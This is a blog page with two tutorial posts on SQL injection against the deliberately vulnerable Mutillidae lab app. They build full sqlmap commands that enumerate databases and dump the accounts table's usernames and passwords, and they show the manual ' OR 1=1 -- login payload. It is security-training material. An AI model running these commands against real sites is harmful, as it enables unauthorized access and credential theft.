Showing posts with label sqli. Show all posts
Showing posts with label sqli. Show all posts

Wednesday, 13 January 2016

SQLMAP - Database takeover tool - the old skool way

Hacking mysql database via SQLMAP

here I will demonstrate a sql injection attack using SQLMAP, I will use this hack to bypass a login

Tools:SQLMAP/Burpsuite
Browser:Iceweasel
Web App:Mutillidae v2.6.30
OS:Kali Linux

First;
  • configure browser and proxy (I'm using burpsuite) then head to 
  •  http://192.168.0.9/mutillidae/index.php?page=login.php 
  • enter some data in the username & password fields
  • In burp review the data from the post capture we need some info for it


so using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is a combination of the host and post field as shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

next part of the command
--data="ENTER_DATA_HERE" (this is actually the body of the post request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

 and finally 
--banner (retrieves database banner)

 the sqlmap command is now complete. our full sqlmap command is;

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection)(**banner**) 


BYPASSING A LOGIN USING SQLMAP 


 so we are 100% certain that the mysql database is vulnerable to sql injection, now we will escalate our attack and see what credentials we can grab

So now as we know we need to bypass the loggin presented to us on the login page, we know now that the application vulnerable to sql injection so we will mount an attack to verify this. We already have the main command for the attack already

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

we simply need to append the command slightly, first new command/switch/paramemter we enter is 

--dbs (this tells us the available databases)

there  was 6 options 

form experience I know that the database we need to attack is named nowasp, now we can further ammend our sqlmap command to ;

 remove --dbs (as we now know the name of the databse that we need to hack)
add
-D owasp 
and add
--tables (the tables switch will list all tables within the database owasp)

 again experience tells me i want to retrieve the info held within the accounts table
we can now further ammend our command
remove
--tables
add
-T accounts
add
--Columns (gives us a list of columns to select info from  
bingo we know have a full list of all the columns of info we want to retrieve, in this case i want
firstname
lastname
password
username
we are now ready to complete our sqlmap command and hack so we
remove
--columns 
and add
-C firstname,lastname,password,username
we need to --dump all credentials retrieved so we can see them so we us the --dump command, our full sqlmap injection command is

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

we have successfully retrieved all usernames & passwords for the login to the system thereby bypassing any need for us to need our own login.



 


Posted by at
Labels: , , ,

Friday, 8 January 2016

OWASP A1 Injection

sqli extract user info low security

  web app: mutillidae
  browser: iceweasel

In this post we will attempt to extract user data from a database using sql injection


 to test for a sqli vulnerability i simply add a single quote into the Name field
this result in information leakage which aids my attack and also exposes many other vulnerabilities however we are solely concerned with obtaining user info. heres the error message


This tells my the database is MySQL it also crucially tells me the ACTUAL SQL query performed. This alone tells me that the paramemter/field Name is likely vulnerable to sql injection now we simply need to complete the sql statement to give us what we want
so we add some comments to our single quote, we add
OR 1=1
now 1 ALWAYS is equal to 1 therefore we are making the statement true
--
we dont have the password there fore using -- comments out the password request so now our full sqli payload is
' OR 1=1 -- <space after comments>
to achieve this we simply type the sql command in the name field
and as shown in the video all USERNAMES & PASSWORDS have been retrieved




Posted by at
Labels: , , , ,
Subscribe to: Posts (Atom)